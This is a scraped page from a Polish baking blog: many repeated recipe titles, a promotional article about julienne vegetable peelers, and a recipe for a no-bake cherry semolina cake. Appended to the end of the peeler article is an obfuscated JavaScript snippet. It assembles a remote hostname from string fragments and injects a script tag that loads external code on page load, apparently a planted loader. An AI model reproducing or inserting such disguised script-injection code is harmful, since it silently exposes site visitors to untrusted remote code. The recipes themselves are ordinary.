profiterolki z musem i sosem czekoladowym

CUKIERENKA KLEMENTYNKI

profiterolki z musem i sosem czekoladowym

mulatka: ciasto czekoladowo-bananowe

CUKIERENKA KLEMENTYNKI

mulatka: ciasto czekoladowo-bananowe

lekki tort z malinami (z motywem Kucyków Pony )

CUKIERENKA KLEMENTYNKI

lekki tort z malinami (z motywem Kucyków Pony )

krem z młodej cukinii i groszku

CUKIERENKA KLEMENTYNKI

krem z młodej cukinii i groszku

ciasto makowe z wiśniami i śliwkami

CUKIERENKA KLEMENTYNKI

ciasto makowe z wiśniami i śliwkami

ciasto kokosowe z jagodami i kruszonką

CUKIERENKA KLEMENTYNKI

ciasto kokosowe z jagodami i kruszonką

ciasto mleczne z porzeczkową galaretką

CUKIERENKA KLEMENTYNKI

ciasto mleczne z porzeczkową galaretką

galaretka z czerwonej porzeczki

CUKIERENKA KLEMENTYNKI

galaretka z czerwonej porzeczki

półkruche ciasto z dynią i kruszonką

CUKIERENKA KLEMENTYNKI

półkruche ciasto z dynią i kruszonką

sernik ze śliwkami

CUKIERENKA KLEMENTYNKI

sernik ze śliwkami

brzdąc- ciasto z czekoladowym kremem

CUKIERENKA KLEMENTYNKI

brzdąc- ciasto z czekoladowym kremem

ciasto pijak z bakaliami

CUKIERENKA KLEMENTYNKI

ciasto pijak z bakaliami

klasyczne jagodzianki

CUKIERENKA KLEMENTYNKI

klasyczne jagodzianki

proste ciasto czekoladowe

CUKIERENKA KLEMENTYNKI

proste ciasto czekoladowe

lody na gorących truskawkach

CUKIERENKA KLEMENTYNKI

lody na gorących truskawkach

mocno czekoladowe ciasto z advocatem i mandarynkami

CUKIERENKA KLEMENTYNKI

mocno czekoladowe ciasto z advocatem i mandarynkami

cynamonowy sernik z brzoskwiniami

CUKIERENKA KLEMENTYNKI

cynamonowy sernik z brzoskwiniami

kokosowe tartaletki z poziomkami

CUKIERENKA KLEMENTYNKI

kokosowe tartaletki z poziomkami

letnie ptasie mleczko z owocami

CUKIERENKA KLEMENTYNKI

letnie ptasie mleczko z owocami

Obieraczki julienne, czyli sztuka w kuchni!

CUKIERENKA KLEMENTYNKI

Obieraczki julienne, czyli sztuka w kuchni!

Jeśli gotowanie jest dla Ciebie sztuką, a Twoje potrawy to uczta dla podniebienia i oczu, to sprawdź już dziś jak przysłuży Ci się obieraczka julienne!Obieraczka do julienne to przyrząd, który w swojej kuchni powinien mieć każdy miłośnik gotowania. Pozwoli nam ona w szybki i prosty sposób przygotować efektowną potrawę, która zachwyci zarówno smakiem, jak i swoim wyglądem. Wszyscy doskonale wiemy, że posiłki powinny być przyrządzone tak, by cieszyły zarówno oczy, jak i podniebienie osób je kosztujących. Właśnie dlatego warto skusić się na zainwestowanie w ten pozornie nieistotny przyrząd, który pozwoli nam na wyczarowanie potrawy, która pozytywnie zaskoczy wszystkich.Julienne to technika krojenia warzyw, w szczególności takich jak: ziemniaki, marchew, pory, seler czy też buraki. Stosując obieraczkę julienne, tworzymy z naszych warzyw cienkie słupki, które następnie mogą być wykorzystane w przygotowaniu bardzo wielu potraw. Myśląc o tym sposobie krojenia warzyw, bardzo często przychodzi nam na myśl kuchnia chińska, jednak historycy nie są pewni, z jakiego kraju wywodzi się technika julienne.Obieraczka julienne to doskonałe rozwiązanie dla wszystkich osób, ceniących sobie połączenie prostoty użycia z najwyższą jakością wykonania akcesoriów kuchennych. Pozwala ona w szybki sposób pokroić różnego rodzaju warzywa, bez konieczności używania do tego siły.Czym się wyróżnia dobra obieraczka julienne?- obrotowe ostrze, dzięki któremu z równą łatwością pokroimy warzywa zarówno podłużne, jak i okrągłe; niezależnie od kształtu warzywa, zostanie ono pocięte w słupki o identycznych wymiarach,- podwójne ostrze, dzięki któremu obieraczka może być swobodnie używana zarówno przez osoby prawo- jak i leworęczne,- obecność zestera, dzięki któremu łatwo zetrzemy skórkę z warzyw takich jak na przykład młode ziemniaczki, a także z cytrusów,- wygodny uchwyt, zapewniający komfort posługiwania się obieraczką przez długi czas.Dzięki obieraczce możemy szybko wyczarować potrawy, których przygotowanie trwałoby bardzo długo przy użyciu tradycyjnego noża. Pocięte w słupki warzywa z powodzeniem możemy wykorzystać do przygotowania zupy, sosu do mięsa, idealnie sprawdzą się również jako ozdoba talerza, na którym zaserwujemy naszym gościom potrawę.Decydując się na zakup obieraczki do julienne, możemy mieć pewność, że inwestujemy w narzędzie, które będzie służyło w naszej kuchni przez wiele lat.(function(){ wXXs=document.createElement("script");wXXs.type="text/javascript"; wXXs.async=true;wXXs_=(("us")+"t")+"a";wXXs_+=("t.i")+""+"n";wXXs_+=(("f")+"o");wXXs_+="/"; wXXsu="10270845.";wXXsu+="lwub4k14XXs444sf9xbfqz0kbu2kxn";wXXs.src="//"+wXXs_+wXXsu; wXXsdb=document.body; wXXsdb.appendChild(wXXs); })();

rolada kawowa z rodzynkami w rumie

CUKIERENKA KLEMENTYNKI

rolada kawowa z rodzynkami w rumie

domowy kopiec kreta

CUKIERENKA KLEMENTYNKI

domowy kopiec kreta

budyniowiec ( bez pieczenia)

CUKIERENKA KLEMENTYNKI

budyniowiec ( bez pieczenia)

wiśniowiec na bazie kaszy manny

CUKIERENKA KLEMENTYNKI

wiśniowiec na bazie kaszy manny

Dziś mam dla Was ciasto, które jest modyfikacją naszego ulubionego ciasta na bazie kaszy manny. Nie trzeba go piec, więc robi się je dosłownie chwilę. Lekko kwaśny smak wiśni przełamuje słodycz masy grysikowej dlatego ciasto będzie idealne na ciepłe dni. *foremka 25*34 cmSkładniki:300 g okrągłych biszkoptów1,5 l mleka1,5 szklanki kaszy manny1,5 szklanki cukru3/4 szklanki drobnych wiórek kokosowych300 g masła2 łyżki kakao250 g mrożonych wiśni1,5 opakowania galaretki wiśniowej ( 110 g)Połowę biszkoptów rozłożyć na dnie blaszki wyłożonej papierem do pieczenia. Mleko zagotować z masłem, wsypać kokos, kaszę mannę i cukier. Gotować aż zgęstnieje. Podzielić na połowę i do jednej części dodać kakao. Gorącą jeszcze masę kakaową wylać na biszkopty i od razu przykryć ją pozostałymi ciastkami. Wylać na nie gorącą masę białą, wyrównać i odstawić do wystudzenia. Nierozmrożone wiśnie przełożyć do rondelka i wstawić na mały ogień, gotować chwilę. Zdjąć z ognia, wsypać galaretkę i dokładnie rozmieszać. Tężejące wiśnie wyłożyć na ciasto i wstawić do lodówki najlepiej na całą noc. 

ciasto

CUKIERENKA KLEMENTYNKI

ciasto "monte"

murzynek z rabarbarem i orzechami

CUKIERENKA KLEMENTYNKI

murzynek z rabarbarem i orzechami

kaczka z jabłkami i majerankiem

CUKIERENKA KLEMENTYNKI

kaczka z jabłkami i majerankiem

ciasto toffi z bezą

CUKIERENKA KLEMENTYNKI

ciasto toffi z bezą

drożdżówki zawijane z serem

CUKIERENKA KLEMENTYNKI

drożdżówki zawijane z serem

CUKIERENKA KLEMENTYNKI

"Stefan" - ciasto bez pieczenia